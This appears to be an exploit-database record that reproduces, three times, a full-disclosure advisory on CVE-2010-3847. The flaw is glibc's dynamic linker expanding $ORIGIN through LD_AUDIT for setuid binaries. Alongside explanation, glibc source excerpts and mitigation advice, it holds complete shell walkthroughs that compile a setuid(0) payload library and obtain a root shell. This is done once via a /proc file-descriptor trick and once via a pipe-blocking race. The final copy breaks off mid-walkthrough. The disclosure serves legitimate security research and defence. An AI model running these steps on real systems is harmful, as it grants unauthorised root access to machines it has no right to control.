\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution \n \n\"For security, the dynamic linker does not allow use of $ORIGIN substitution \nsequences for set-user and set-group ID programs. For such sequences that \nappear within strings specified by DT_RUNPATH dynamic array entries, the \nspecific search path containing the $ORIGIN sequence is ignored (though other \nsearch paths in the same string are processed). $ORIGIN sequences within a \nDT_NEEDED entry or path passed as a parameter to dlopen() are treated as \nerrors. The same restrictions may be applied to processes that have more than \nminimal privileges on systems with installed extended security mechanisms.\" \n \nHowever, glibc ignores this recommendation. The attack the ELF designers were \nlikely concerned about is users creating hardlinks to suid executables in \ndirectories they control and then executing them, thus controlling the \nexpansion of $ORIGIN. \n \nIt is tough to form a thorough complaint about this glibc behaviour however, \nas any developer who believes they're smart enough to safely create suid \nprograms should be smart enough to understand the implications of $ORIGIN \nand hard links on load behaviour. The glibc maintainers are some of the \nsmartest guys in free software, and well known for having a \"no hand-holding\" \nstance on various issues, so I suspect they wanted a better argument than this \nfor modifying the behaviour (I pointed it out a few years ago, but there was \nlittle interest). \n \nHowever, I have now discovered a way to exploit this. The origin expansion \nmechanism is recycled for use in LD_AUDIT support, although an attempt is made \nto prevent it from working, it is insufficient. \n \nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit \nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does. \nHowever, $ORIGIN expansion is only prevented if it is not used in isolation. \n \nThe codepath that triggers this expansion is \n \n_dl_init_paths() -> _dl_dst_substitute() -> _is_dst() \n \n(in the code below DST is dynamic string token) \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741 \n \n741 /* Expand DSTs. */ \n742 size_t cnt = DL_DST_COUNT (llp, 1); \n743 if (__builtin_expect (cnt == 0, 1)) \n744 llp_tmp = strdupa (llp); \n745 else \n746 { \n747 /* Determine the length of the substituted string. */ \n748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt); \n749 \n750 /* Allocate the necessary memory. */ \n751 llp_tmp = (char *) alloca (total + 1); \n752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1); \n753 } \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245 \n \n253 if (__builtin_expect (*name == '$', 0)) \n254 { \n255 const char *repl = NULL; \n256 size_t len; \n257 \n258 ++name; \n259 if ((len = is_dst (start, name, \"ORIGIN\", is_path, \n260 INTUSE(__libc_enable_secure))) != 0) \n261 { \n... \n267 repl = l->l_origin; \n268 } \n \nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171 \n \n \n202 if (__builtin_expect (secure, 0) \n203 && ((name[len] != '\\0' && (!is_path || name[len] != ':')) \n204 || (name != start + 1 && (!is_path || name[-2] != ':')))) \n205 return 0; \n206 \n207 return len; \n208 } \n \nAs you can see, $ORIGIN is only expanded if it is alone and first in the path. \nThis makes little sense, and does not appear to be useful even if there were \nno security impact. This was most likely the result of an attempt to re-use the \nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally \nintroducing this error. \n \nPerhaps surprisingly, this error is exploitable. \n \n-------------------- \nAffected Software \n------------------------ \n \nAt least the following versions have been tested \n \n2.12.1, FC13 \n2.5, RHEL5 / CentOS5 \n \nOther versions are probably affected, possibly via different vectors. I'm aware \nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I \ndo not know if it's possible to avoid this. \n \n-------------------- \nConsequences \n----------------------- \n \nIt is possible to exploit this flaw to execute arbitrary code as root. \n \nPlease note, this is a low impact vulnerability that is only of interest to \nsecurity professionals and system administrators. End users do not need \nto be concerned. \n \nExploitation would look like the following. \n \n# Create a directory in /tmp we can control. \n$ mkdir /tmp/exploit \n \n# Link to an suid binary, thus changing the definition of $ORIGIN. \n$ ln /bin/ping /tmp/exploit/target \n \n# Open a file descriptor to the target binary (note: some users are surprised \n# to learn exec can be used to manipulate the redirections of the current \n# shell if a command is not specified. This is what is happening below). \n$ exec 3< /tmp/exploit/target \n \n# This descriptor should now be accessible via /proc. \n$ ls -l /proc/$$/fd/3 \nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* \n \n# Remove the directory previously created \n$ rm -rf /tmp/exploit/ \n \n# The /proc link should still exist, but now will be marked deleted. \n$ ls -l /proc/$$/fd/3 \nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) \n \n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen(). \n$ cat > payload.c \nvoid __attribute__((constructor)) init() \n{ \nsetuid(0); \nsystem(\"/bin/bash\"); \n} \n^D \n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c \n$ ls -l /tmp/exploit \n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* \n \n# Now force the link in /proc to load $ORIGIN via LD_AUDIT. \n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3 \nsh-4.1# whoami \nroot \nsh-4.1# id \nuid=0(root) gid=500(taviso) \n \n------------------- \nMitigation \n----------------------- \n \nIt is a good idea to prevent users from creating files on filesystems mounted \nwithout nosuid. The following interesting solution for administrators who \ncannot modify their partitioning scheme was suggested to me by Rob Holland \n(@robholland): \n \nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid, \nfor example: \n \n# mount -o bind /tmp /tmp \n# mount -o remount,bind,nosuid /tmp /tmp \n \nBe aware of race conditions at boot via crond/atd/etc, and users with \nreferences to existing directories (man lsof), but this may be an acceptable \nworkaround until a patch is ready for deployment. \n \n(Of course you need to do this everywhere untrusted users can make links to \nsuid/sgid binaries. find(1) is your friend). \n \nIf someone wants to create an init script that would automate this at boot for \ntheir distribution, I'm sure it would be appreciated by other administrators. \n \n------------------- \nSolution \n----------------------- \n \nMajor distributions should be releasing updated glibc packages shortly. \n \n------------------- \nCredit \n----------------------- \n \nThis bug was discovered by Tavis Ormandy. \n \n------------------- \nGreetz \n----------------------- \n \nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert, \nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D., \nand all my other elite friends and colleagues. \n \nAdditional greetz to the openwall guys who saw this problem coming years ago. \nThey continue to avoid hundreds of security vulnerabilities each year thanks to \ntheir insight into systems security. \n \nhttp://www.openwall.com/owl/ \n \n------------------- \nNotes \n----------------------- \n \nThere are several known techniques to exploit dynamic loader bugs for suid \nbinaries, the fexecve() technique listed in the Consequences section above is a \nmodern technique, making use of relatively recent Linux kernel features (it was \nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I \nbelieve Gabriel Campana came up with the same solution independently). \n \nThe classic UNIX technique is a little less elegant, but has the advantage that \nread access is not required for the target binary. It is rather common for \nadministrators to remove read access from suid binaries in order to make \nattackers work a little harder, so I will document it here for reference. \n \nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16 \nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the \nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(), \nanything written to stderr will block, so you simply execve() and then make the \nloader print some error message, allowing you to reliably win any race \ncondition. \n \nLD_DEBUG has always been a a good candidate for getting error messages on \nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to \nsome minor complaints about information leaks, but it can still be used with a \nslight modification (I first learned of this technique from a bugtraq posting \nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281). \n \nThe exploit flow for this alternative attack is a little more complicated, but \nwe can still use the shell to do it (this session is from an FC13 system, \noutput cleaned up for clarity). \n \n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection. \n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) & \n[1] 26926 \n \n# Now ld.so is blocked on write() in the background trying to say \"invalid \n# debug option\", so we are free to manipulate the filesystem. \n$ rm -rf /tmp/exploit/ \n \n# Put exploit payload in place. \n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c \n \n# Clear the pipe by killing sleep, letting cat drain the contents. This will \n# unblock the target, allowing it to continue. \n$ pkill -n -t $(tty | sed 's#/dev/##') sleep \n-bash: line 99: 26929 Terminated sleep 1h \n \n# And now we can take control of a root shell :-) \n$ fg \nsh-4.1# id \nuid=0(root) gid=500(taviso) \n \nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then \nwhile the loader is trying to map lots of memory, you have a good chance of \nwinning any race. I previously found an integer overflow in this feature and \nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc \nmaintainers disagreed and just fixed the overflow. \n \nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html \n \nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the \nnext big loader bug is going to be, it's just not safe to let attackers have \nthat much control over the execution environment of privileged programs. \n \nFinally, some notes on ELF security for newcomers. The following common \nconditions are usually exploitable: \n \n- An empty DT_RPATH, i.e. -Wl,-rpath,\"\" \nThis is a surprisingly common build error, due to variable expansion \nfailing during the build process. \n- A relative, rather than absolute DT_RPATH. \nFor example, -Wl,-rpath,\"lib/foo\". \n \nI'll leave it as an exercise for the interested reader to explain why. Remember \nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths \nfor their dependencies, and so on. \n \n------------------- \nReferences \n----------------------- \n \n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual. \n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual. \n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual. \n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0. \n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574 \n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html \n \nYou should subscribe to Linux Weekly News and help support their high standard \nof security journalism. \n \nhttp://lwn.net/ \n \nI have a twitter account where I occasionally comment on security topics. \n \nhttp://twitter.com/taviso \n \nex$$ \n \n-- \n------------------------------------- \ntaviso@cmpxchg8b.com | pgp encrypted mail preferred \n------------------------------------------------------- \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/94955/gnuc-origin.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "description": "\nGNU C library dynamic linker - $ORIGIN Expansion", "cvss3": {}, "published": "2010-10-18T00:00:00", "type": "exploitpack", "title": "GNU C library dynamic linker - $ORIGIN Expansion", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-18T00:00:00", "id": "EXPLOITPACK:FC124E21A6FD828BCB8AB10DC2D60915", "href": "", "sourceData": "from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\n\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\n------------------------------------------------------------------------------\n\nGruezi, This is CVE-2010-3847.\n\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\ndynamically linked programs. ld.so operates in two security modes, a permissive\nmode that allows a high degree of control over the load operation, and a secure\nmode (libc_enable_secure) intended to prevent users from interfering with the\nloading of privileged executables.\n\n$ORIGIN is an ELF substitution sequence representing the location of the\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\nexecutables to specify a search path for libraries that is relative to their\nlocation, to simplify packaging without spamming the standard search paths with\nsingle-use libraries.\n\nNote that despite the confusing naming convention, $ORIGIN is specified in a\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\nenvironment (developers would normally use the -rpath ld parameter, or\n-Wl,-rpath,$ORIGIN via the compiler driver).\n\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\nbinaries,\n\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\n\n\"For security, the dynamic linker does not allow use of $ORIGIN substitution\n sequences for set-user and set-group ID programs. For such sequences that\n appear within strings specified by DT_RUNPATH dynamic array entries, the\n specific search path containing the $ORIGIN sequence is ignored (though other\n search paths in the same string are processed). $ORIGIN sequences within a\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\n errors. The same restrictions may be applied to processes that have more than\n minimal privileges on systems with installed extended security mechanisms.\"\n\nHowever, glibc ignores this recommendation. The attack the ELF designers were\nlikely concerned about is users creating hardlinks to suid executables in\ndirectories they control and then executing them, thus controlling the\nexpansion of $ORIGIN.\n\nIt is tough to form a thorough complaint about this glibc behaviour however,\nas any developer who believes they're smart enough to safely create suid\nprograms should be smart enough to understand the implications of $ORIGIN\nand hard links on load behaviour. The glibc maintainers are some of the\nsmartest guys in free software, and well known for having a \"no hand-holding\"\nstance on various issues, so I suspect they wanted a better argument than this\nfor modifying the behaviour (I pointed it out a few years ago, but there was\nlittle interest).\n\nHowever, I have now discovered a way to exploit this. The origin expansion\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\nto prevent it from working, it is insufficient.\n\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\n\nThe codepath that triggers this expansion is\n\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\n\n(in the code below DST is dynamic string token)\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\n\n 741 /* Expand DSTs. */\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\n 743 if (__builtin_expect (cnt == 0, 1))\n 744 llp_tmp = strdupa (llp);\n 745 else\n 746 {\n 747 /* Determine the length of the substituted string. */\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\n 749\n 750 /* Allocate the necessary memory. */\n 751 llp_tmp = (char *) alloca (total + 1);\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\n 753 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\n\n 253 if (__builtin_expect (*name == '$', 0))\n 254 {\n 255 const char *repl = NULL;\n 256 size_t len;\n 257\n 258 ++name;\n 259 if ((len = is_dst (start, name, \"ORIGIN\", is_path,\n 260 INTUSE(__libc_enable_secure))) != 0)\n 261 {\n ...\n 267 repl = l->l_origin;\n 268 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\n\n\n 202 if (__builtin_expect (secure, 0)\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\n 205 return 0;\n 206\n 207 return len;\n 208 }\n\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\nThis makes little sense, and does not appear to be useful even if there were\nno security impact. This was most likely the result of an attempt to re-use the\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\nintroducing this error.\n\nPerhaps surprisingly, this error is exploitable.\n\n--------------------\nAffected Software\n------------------------\n\nAt least the following versions have been tested\n\n 2.12.1, FC13\n 2.5, RHEL5 / CentOS5\n\nOther versions are probably affected, possibly via different vectors. I'm aware\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\ndo not know if it's possible to avoid this.\n\n--------------------\nConsequences\n-----------------------\n\nIt is possible to exploit this flaw to execute arbitrary code as root.\n\nPlease note, this is a low impact vulnerability that is only of interest to\nsecurity professionals and system administrators. End users do not need\nto be concerned.\n\nExploitation would look like the following.\n\n# Create a directory in /tmp we can control.\n$ mkdir /tmp/exploit\n\n# Link to an suid binary, thus changing the definition of $ORIGIN.\n$ ln /bin/ping /tmp/exploit/target\n\n# Open a file descriptor to the target binary (note: some users are surprised\n# to learn exec can be used to manipulate the redirections of the current\n# shell if a command is not specified. This is what is happening below).\n$ exec 3< /tmp/exploit/target\n\n# This descriptor should now be accessible via /proc.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\n\n# Remove the directory previously created\n$ rm -rf /tmp/exploit/\n\n# The /proc link should still exist, but now will be marked deleted.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\n\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\n$ cat > payload.c\nvoid __attribute__((constructor)) init()\n{\n setuid(0);\n system(\"/bin/bash\");\n}\n^D\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n$ ls -l /tmp/exploit\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\n\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\n$ LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3\nsh-4.1# whoami\nroot\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\n-------------------\nMitigation\n-----------------------\n\nIt is a good idea to prevent users from creating files on filesystems mounted\nwithout nosuid. The following interesting solution for administrators who\ncannot modify their partitioning scheme was suggested to me by Rob Holland\n(@robholland):\n\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\nfor example:\n\n# mount -o bind /tmp /tmp\n# mount -o remount,bind,nosuid /tmp /tmp\n\nBe aware of race conditions at boot via crond/atd/etc, and users with\nreferences to existing directories (man lsof), but this may be an acceptable\nworkaround until a patch is ready for deployment.\n\n(Of course you need to do this everywhere untrusted users can make links to\nsuid/sgid binaries. find(1) is your friend).\n\nIf someone wants to create an init script that would automate this at boot for\ntheir distribution, I'm sure it would be appreciated by other administrators.\n\n-------------------\nSolution\n-----------------------\n\nMajor distributions should be releasing updated glibc packages shortly.\n\n-------------------\nCredit\n-----------------------\n\nThis bug was discovered by Tavis Ormandy.\n\n-------------------\nGreetz\n-----------------------\n\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\nand all my other elite friends and colleagues.\n\nAdditional greetz to the openwall guys who saw this problem coming years ago.\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\ntheir insight into systems security.\n\nhttp://www.openwall.com/owl/\n\n-------------------\nNotes\n-----------------------\n\nThere are several known techniques to exploit dynamic loader bugs for suid\nbinaries, the fexecve() technique listed in the Consequences section above is a\nmodern technique, making use of relatively recent Linux kernel features (it was\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\nbelieve Gabriel Campana came up with the same solution independently).\n\nThe classic UNIX technique is a little less elegant, but has the advantage that\nread access is not required for the target binary. It is rather common for\nadministrators to remove read access from suid binaries in order to make\nattackers work a little harder, so I will document it here for reference.\n\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\nbytes capacity on Linux, see the section on \"Pipe Capacity\" in pipe(7) from the\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\nanything written to stderr will block, so you simply execve() and then make the\nloader print some error message, allowing you to reliably win any race\ncondition.\n\nLD_DEBUG has always been a a good candidate for getting error messages on\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\nsome minor complaints about information leaks, but it can still be used with a\nslight modification (I first learned of this technique from a bugtraq posting\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\n\nThe exploit flow for this alternative attack is a little more complicated, but\nwe can still use the shell to do it (this session is from an FC13 system,\noutput cleaned up for clarity).\n\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT=\"\\$ORIGIN\" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\n[1] 26926\n\n# Now ld.so is blocked on write() in the background trying to say \"invalid\n# debug option\", so we are free to manipulate the filesystem.\n$ rm -rf /tmp/exploit/\n\n# Put exploit payload in place.\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\n\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\n# unblock the target, allowing it to continue.\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\n-bash: line 99: 26929 Terminated sleep 1h\n\n# And now we can take control of a root shell :-)\n$ fg\nsh-4.1# id\nuid=0(root) gid=500(taviso)\n\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\nwhile the loader is trying to map lots of memory, you have a good chance of\nwinning any race. I previously found an integer overflow in this feature and\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\nmaintainers disagreed and just fixed the overflow.\n\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\n\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\nnext big loader bug is going to be, it's just not safe to let attackers have\nthat much control over the execution environment of privileged programs.\n\nFinally, some notes on ELF security for newcomers. The following common\nconditions are usually exploitable:\n\n - An empty DT_RPATH, i.e. -Wl,-rpath,\"\"\n This is a surprisingly common build error, due to variable expansion\n failing during the build process.\n - A relative, rather than absolute DT_RPATH.\n For example, -Wl,-rpath,\"lib/foo\".\n\nI'll leave it as an exercise for the interested reader to explain why. Remember\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\nfor their dependencies, and so on.\n\n-------------------\nReferences\n-----------------------\n\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\n\nYou should subscribe to Linux Weekly News and help support their high standard\nof security journalism.\n\nhttp://lwn.net/\n\nI have a twitter account where I occasionally comment on security topics.\n\nhttp://twitter.com/taviso\n\nex$$", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2023-06-07T16:23:31", "description": "", "cvss3": {}, "published": "2010-10-18T00:00:00", "type": "exploitdb", "title": "GNU C library dynamic linker - '$ORIGIN' Expansion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2010-3847", "2011-0536", "CVE-2009-1894", "CVE-2010-3847"], "modified": "2010-10-18T00:00:00", "id": "EDB-ID:15274", "href": "https://www.exploit-db.com/exploits/15274", "sourceData": "from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\n\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\n------------------------------------------------------------------------------\n\nGruezi, This is CVE-2010-3847.\n\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\ndynamically linked programs. ld.so operates in two security modes, a permissive\nmode that allows a high degree of control over the load operation, and a secure\nmode (libc_enable_secure) intended to prevent users from interfering with the\nloading of privileged executables.\n\n$ORIGIN is an ELF substitution sequence representing the location of the\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\nexecutables to specify a search path for libraries that is relative to their\nlocation, to simplify packaging without spamming the standard search paths with\nsingle-use libraries.\n\nNote that despite the confusing naming convention, $ORIGIN is specified in a\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\nenvironment (developers would normally use the -rpath ld parameter, or\n-Wl,-rpath,$ORIGIN via the compiler driver).\n\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\nbinaries,\n\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\n\n\"For security, the dynamic linker does not allow use of $ORIGIN substitution\n sequences for set-user and set-group ID programs. For such sequences that\n appear within strings specified by DT_RUNPATH dynamic array entries, the\n specific search path containing the $ORIGIN sequence is ignored (though other\n search paths in the same string are processed). $ORIGIN sequences within a\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\n errors. The same restrictions may be applied to processes that have more than\n minimal privileges on systems with installed extended security mechanisms.\"\n\nHowever, glibc ignores this recommendation. The attack the ELF designers were\nlikely concerned about is users creating hardlinks to suid executables in\ndirectories they control and then executing them, thus controlling the\nexpansion of $ORIGIN.\n\nIt is tough to form a thorough complaint about this glibc behaviour however,\nas any developer who believes they're smart enough to safely create suid\nprograms should be smart enough to understand the implications of $ORIGIN\nand hard links on load behaviour. The glibc maintainers are some of the\nsmartest guys in free software, and well known for having a \"no hand-holding\"\nstance on various issues, so I suspect they wanted a better argument than this\nfor modifying the behaviour (I pointed it out a few years ago, but there was\nlittle interest).\n\nHowever, I have now discovered a way to exploit this. The origin expansion\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\nto prevent it from working, it is insufficient.\n\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\n\nThe codepath that triggers this expansion is\n\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\n\n(in the code below DST is dynamic string token)\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\n\n 741 /* Expand DSTs. */\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\n 743 if (__builtin_expect (cnt == 0, 1))\n 744 llp_tmp = strdupa (llp);\n 745 else\n 746 {\n 747 /* Determine the length of the substituted string. */\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\n 749\n 750 /* Allocate the necessary memory. */\n 751 llp_tmp = (char *) alloca (total + 1);\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\n 753 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\n\n 253 if (__builtin_expect (*name == '$', 0))\n 254 {\n 255 const char *repl = NULL;\n 256 size_t len;\n 257\n 258 ++name;\n 259 if ((len = is_dst (start, name, \"ORIGIN\", is_path,\n 260 INTUSE(__libc_enable_secure))) != 0)\n 261 {\n ...\n 267 repl = l->l_origin;\n 268 }\n\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\n\n\n 202 if (__builtin_expect (secure, 0)\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\n 205 return 0;\n 206\n 207 return len;\n 208 }\n\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\nThis makes little sense, and does not appear to be useful even if there were\nno security impact. This was most likely the result of an attempt to re-use the\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\nintroducing this error.\n\nPerhaps surprisingly, this error is exploitable.\n\n--------------------\nAffected Software\n------------------------\n\nAt least the following versions have been tested\n\n 2.12.1, FC13\n 2.5, RHEL5 / CentOS5\n\nOther versions are probably affected, possibly via different vectors. I'm aware\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\ndo not know if it's possible to avoid this.\n\n--------------------\nConsequences\n-----------------------\n\nIt is possible to exploit this flaw to execute arbitrary code as root.\n\nPlease note, this is a low impact vulnerability that is only of interest to\nsecurity professionals and system administrators. End users do not need\nto be concerned.\n\nExploitation would look like the following.\n\n# Create a directory in /tmp we can control.\n$ mkdir /tmp/exploit\n\n# Link to an suid binary, thus changing the definition of $ORIGIN.\n$ ln /bin/ping /tmp/exploit/target\n\n# Open a file descriptor to the target binary (note: some users are surprised\n# to learn exec can be used to manipulate the redirections of the current\n# shell if a command is not specified. This is what is happening below).\n$ exec 3< /tmp/exploit/target\n\n# This descriptor should now be accessible via /proc.\n$ ls -l /proc/$$/fd/3\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\n\n# Remove the directory previously created\n$ rm -rf /tmp/exploit/\n\n# The 